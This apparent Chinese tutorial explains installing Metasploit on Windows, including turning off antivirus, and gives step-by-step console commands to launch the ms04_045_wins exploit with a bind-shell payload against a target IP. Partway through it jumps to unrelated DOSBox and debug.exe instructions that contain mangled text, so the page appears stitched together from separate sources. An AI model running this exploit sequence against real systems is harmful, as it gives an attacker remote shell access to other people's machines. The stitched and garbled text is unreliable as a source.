如何安装metasploit

一、搭建metasploit环境

Windows环境下安装

metasploit

安装时需要注意要关闭杀毒软件，如果安装有杀毒软件，会提示在metasploit的安装目录下检测到病毒或木马。

二、metasploit的使用

Metasploit目前提供了三种用户使用接口，一个是GUI模式，另一个是console模式，第三种是CLI（命令行）模式。原来还提供一种WEB模式，目前已经不再支持。目前这三种模式各有优缺点，建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能，还可以在console中执行一些其它的外部命令，如ping。

Windows下GUI启动方式，从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示：

其GUI模式启动后界面如图2所示：

Windows下console模式的启动方式与GUI方式类似，启动后界面如图3所示：

Metasploit的使用较为简单，了解其基本命令即可。下面以console的使用方式为例说明如何使用：

输入help或？可查看帮助信息。

下面以exploit中的ms04_045_wins为例进行说明。

1、show exploits，

2、info exploit/windows/wins/ms04_045_wins，查看其描述信息。

3、use exploit/windows/wins/ms04_045_wins，使用此exploit。

4、show options，查看相应的选项

5、set RHOST    192.168.1.200，设置目标

6、set RPORT    7777，设置端口

7、set PAYLOAD generic/shell_bind_tcp，设置使用的shellcode

8、exploit，执行攻击

（1）在互联网上下载DOSBOX、DEBUG32.EXE或debug.exe程序，把DOSBOX程序安装 在计算机中。 DEBUG32.EXE或debug.exe程序。

（2）在已知路径的文件夹中存储DEBUG32.EXE或debug.exe程序。

（3）双击桌面上的运行安装好的DOSBOX程序。

（4）依次输入以下命令：

1>Mount c f：\1 *********** 这个指令的意思是将1这个文件夹挂载为DOSBOX的C盘（这样1文件夹就是DOSBOX的C盘）

2>C： *********** 切换到C盘 3>Debug32

总结：上面的界面窗口已经打开了debug，其后 *** 作和 *** 作debug相同，退出时输入命令：quit 并点击enter键，就退出debug调试，重新进入DOSBOX程序中。

---